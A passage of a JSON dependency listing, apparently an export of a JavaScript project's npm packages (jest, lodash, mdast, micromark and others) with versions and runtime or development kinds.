l@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860652,"package_name":"is-alphanumerical@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860653,"package_name":"is-array-buffer@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860654,"package_name":"is-arrayish@0.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860655,"package_name":"is-arrayish@0.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860656,"package_name":"is-bigint@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860657,"package_name":"is-binary-path@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860658,"package_name":"is-boolean-object@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860659,"package_name":"is-buffer@2.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860660,"package_name":"is-builtin-module@3.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860661,"package_name":"is-callable@1.2.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860662,"package_name":"is-ci@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860663,"package_name":"is-core-module@2.10.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860664,"package_name":"is-core-module@2.12.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860665,"package_name":"is-date-object@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860666,"package_name":"is-decimal@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860667,"package_name":"is-docker@2.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860668,"package_name":"is-extglob@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860669,"package_name":"is-fullwidth-code-point@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860670,"package_name":"is-fullwidth-code-point@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860671,"package_name":"is-generator-fn@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860672,"package_name":"is-glob@4.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860673,"package_name":"is-hexadecimal@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860674,"package_name":"is-installed-globally@0.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860675,"package_name":"is-localhost-ip@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860677,"package_name":"is-module@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860678,"package_name":"is-negative-zero@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860679,"package_name":"is-number-object@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860680,"package_name":"is-number@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860681,"package_name":"is-obj@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860682,"package_name":"is-obj@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860683,"package_name":"is-path-inside@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860684,"package_name":"is-plain-obj@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860685,"package_name":"is-plain-obj@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860686,"package_name":"is-plain-obj@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860687,"package_name":"is-plain-object@2.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860688,"package_name":"is-potential-custom-element-name@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860689,"package_name":"is-promise@2.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860690,"package_name":"is-regex@1.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860691,"package_name":"is-regexp@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860692,"package_name":"is-shared-array-buffer@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860693,"package_name":"is-stream@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860694,"package_name":"is-stream@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860695,"package_name":"is-stream@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860696,"package_name":"is-string@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860697,"package_name":"is-symbol@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860698,"package_name":"is-text-path@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860699,"package_name":"is-typed-array@1.1.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860700,"package_name":"is-typedarray@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860701,"package_name":"is-unicode-supported@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860702,"package_name":"is-weakref@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860703,"package_name":"is-windows@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860705,"package_name":"isarray@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860706,"package_name":"isexe@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860707,"package_name":"isobject@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860708,"package_name":"isstream@0.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860709,"package_name":"istanbul-lib-coverage@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860710,"package_name":"istanbul-lib-coverage@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860711,"package_name":"istanbul-lib-hook@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860712,"package_name":"istanbul-lib-instrument@4.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860713,"package_name":"istanbul-lib-instrument@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860838,"package_name":"istanbul-lib-instrument@5.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860839,"package_name":"istanbul-lib-processinfo@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860840,"package_name":"istanbul-lib-report@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860841,"package_name":"istanbul-lib-report@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860842,"package_name":"istanbul-lib-source-maps@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860843,"package_name":"istanbul-reports@3.1.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860844,"package_name":"iterm2-version@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860848,"package_name":"jackspeak@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860849,"package_name":"jake@10.8.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860850,"package_name":"jest-changed-files@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860851,"package_name":"jest-circus@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860852,"package_name":"jest-cli@29.5.0(@types","ecosystem":"npm","requirements":"node@18.16.0)(ts-node@10.9.1)","direct":false,"kind":"development","optional":false},{"id":14013860853,"package_name":"jest-config@29.5.0(@types","ecosystem":"npm","requirements":"node@18.16.0)(ts-node@10.9.1)","direct":false,"kind":"development","optional":false},{"id":14013860854,"package_name":"jest-diff@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860855,"package_name":"jest-docblock@29.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860856,"package_name":"jest-each@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860857,"package_name":"jest-environment-node@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860858,"package_name":"jest-get-type@29.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860859,"package_name":"jest-haste-map@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860860,"package_name":"jest-image-snapshot@4.2.0(jest@29.5.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860862,"package_name":"jest-leak-detector@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860863,"package_name":"jest-matcher-utils@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860864,"package_name":"jest-message-util@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860865,"package_name":"jest-mock@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860866,"package_name":"jest-pnp-resolver@1.2.2(jest-resolve@29.5.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860867,"package_name":"jest-regex-util@29.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860868,"package_name":"jest-resolve-dependencies@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860869,"package_name":"jest-resolve@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860870,"package_name":"jest-runner@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860871,"package_name":"jest-runtime@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860872,"package_name":"jest-snapshot@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860873,"package_name":"jest-util@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860874,"package_name":"jest-validate@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860875,"package_name":"jest-watcher@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860876,"package_name":"jest-worker@26.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860877,"package_name":"jest-worker@27.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860878,"package_name":"jest-worker@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860879,"package_name":"jest@29.5.0(@types","ecosystem":"npm","requirements":"node@18.16.0)(ts-node@10.9.1)","direct":false,"kind":"development","optional":false},{"id":14013860880,"package_name":"jison-lex@0.3.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860883,"package_name":"jison@0.4.18","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860889,"package_name":"jiti@1.18.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860890,"package_name":"jiti@1.19.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013860891,"package_name":"jju@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860892,"package_name":"joi@17.7.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860896,"package_name":"jpeg-js@0.4.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860919,"package_name":"js-base64@3.7.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860920,"package_name":"js-sdsl@4.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860993,"package_name":"js-tokens@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860994,"package_name":"js-yaml@3.14.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860995,"package_name":"js-yaml@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860996,"package_name":"jsbn@0.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860997,"package_name":"jsdoc-type-pratt-parser@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860998,"package_name":"jsdom@22.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013860999,"package_name":"jsesc@0.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861000,"package_name":"jsesc@2.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861001,"package_name":"jsesc@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861002,"package_name":"json-buffer@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861003,"package_name":"json-parse-even-better-errors@2.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861004,"package_name":"json-schema-to-typescript@11.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861029,"package_name":"json-schema-traverse@0.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861030,"package_name":"json-schema-traverse@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861031,"package_name":"json-schema@0.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861032,"package_name":"json-stable-stringify-without-jsonify@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861033,"package_name":"json-stringify-safe@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861034,"package_name":"json5@2.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861035,"package_name":"jsonc-parser@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861036,"package_name":"jsonfile@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861037,"package_name":"jsonfile@6.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861038,"package_name":"jsonlint@1.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861504,"package_name":"jsonparse@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861505,"package_name":"jsonpointer@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861506,"package_name":"jsprim@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861507,"package_name":"junk@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861508,"package_name":"keyv@4.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861526,"package_name":"khroma@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013861527,"package_name":"kind-of@6.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861528,"package_name":"kleur@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861529,"package_name":"kleur@4.1.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013861530,"package_name":"kolorist@1.8.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861531,"package_name":"ky@0.30.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861827,"package_name":"layout-base@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013861831,"package_name":"layout-base@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013861835,"package_name":"lazy-ass@1.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861838,"package_name":"leven@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861841,"package_name":"levn@0.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861843,"package_name":"levn@0.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013861846,"package_name":"lex-parser@0.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862214,"package_name":"light-my-request@4.12.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862217,"package_name":"lilconfig@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862219,"package_name":"lines-and-columns@1.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862222,"package_name":"linkify-it@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862225,"package_name":"lint-staged@13.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862228,"package_name":"listr2@3.14.0(enquirer@2.3.6)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862232,"package_name":"listr2@5.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862234,"package_name":"loader-runner@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862236,"package_name":"local-pkg@0.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862239,"package_name":"locate-path@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862241,"package_name":"locate-path@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862243,"package_name":"locate-path@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862245,"package_name":"lodash-es@4.17.21","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862247,"package_name":"lodash.camelcase@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862249,"package_name":"lodash.debounce@4.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862251,"package_name":"lodash.flattendeep@4.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862254,"package_name":"lodash.isfunction@3.0.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862256,"package_name":"lodash.isplainobject@4.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862259,"package_name":"lodash.kebabcase@4.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862261,"package_name":"lodash.merge@4.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862264,"package_name":"lodash.mergewith@4.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862266,"package_name":"lodash.once@4.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862268,"package_name":"lodash.snakecase@4.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862271,"package_name":"lodash.sortby@4.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862273,"package_name":"lodash.startcase@4.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862275,"package_name":"lodash.uniq@4.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862277,"package_name":"lodash.upperfirst@4.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862279,"package_name":"lodash@4.17.21","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862282,"package_name":"log-symbols@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862284,"package_name":"log-update@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862287,"package_name":"loglevel-plugin-prefix@0.8.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862330,"package_name":"loglevel@1.8.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862358,"package_name":"longest-streak@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862359,"package_name":"loupe@2.3.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862360,"package_name":"lowercase-keys@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862361,"package_name":"lru-cache@5.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862362,"package_name":"lru-cache@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862363,"package_name":"lru-cache@9.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862364,"package_name":"lru-queue@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862365,"package_name":"lunr@2.3.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862366,"package_name":"magic-string@0.25.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862367,"package_name":"magic-string@0.30.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862368,"package_name":"magic-string@0.30.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862369,"package_name":"magic-string@0.30.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862370,"package_name":"make-dir@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862371,"package_name":"make-dir@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862372,"package_name":"make-error@1.3.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862373,"package_name":"makeerror@1.0.12","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862374,"package_name":"map-obj@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862375,"package_name":"map-obj@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862376,"package_name":"map-stream@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862377,"package_name":"mark.js@8.11.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862378,"package_name":"markdown-it@13.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862379,"package_name":"markdown-table@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862380,"package_name":"marked@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862381,"package_name":"matchit@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862382,"package_name":"mdast-builder@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862656,"package_name":"mdast-util-find-and-replace@2.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862660,"package_name":"mdast-util-from-markdown@0.8.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862664,"package_name":"mdast-util-from-markdown@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862667,"package_name":"mdast-util-frontmatter@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862772,"package_name":"mdast-util-gfm-autolink-literal@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862773,"package_name":"mdast-util-gfm-footnote@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862774,"package_name":"mdast-util-gfm-strikethrough@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862775,"package_name":"mdast-util-gfm-table@1.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862776,"package_name":"mdast-util-gfm-task-list-item@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862777,"package_name":"mdast-util-gfm@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862778,"package_name":"mdast-util-to-markdown@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862779,"package_name":"mdast-util-to-string@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862780,"package_name":"mdast-util-to-string@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862781,"package_name":"mdn-data@2.0.30","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862782,"package_name":"mdurl@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862783,"package_name":"media-typer@0.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862784,"package_name":"memfs@3.4.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862787,"package_name":"memoizee@0.4.15","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862788,"package_name":"meow@10.1.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862789,"package_name":"meow@8.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862790,"package_name":"merge-descriptors@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862791,"package_name":"merge-stream@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862792,"package_name":"merge2@1.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862793,"package_name":"methods@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862794,"package_name":"micromark-core-commonmark@1.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862795,"package_name":"micromark-extension-frontmatter@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862796,"package_name":"micromark-extension-gfm-autolink-literal@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862797,"package_name":"micromark-extension-gfm-footnote@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862798,"package_name":"micromark-extension-gfm-strikethrough@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862799,"package_name":"micromark-extension-gfm-table@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862800,"package_name":"micromark-extension-gfm-tagfilter@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862801,"package_name":"micromark-extension-gfm-task-list-item@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862802,"package_name":"micromark-extension-gfm@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862803,"package_name":"micromark-factory-destination@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"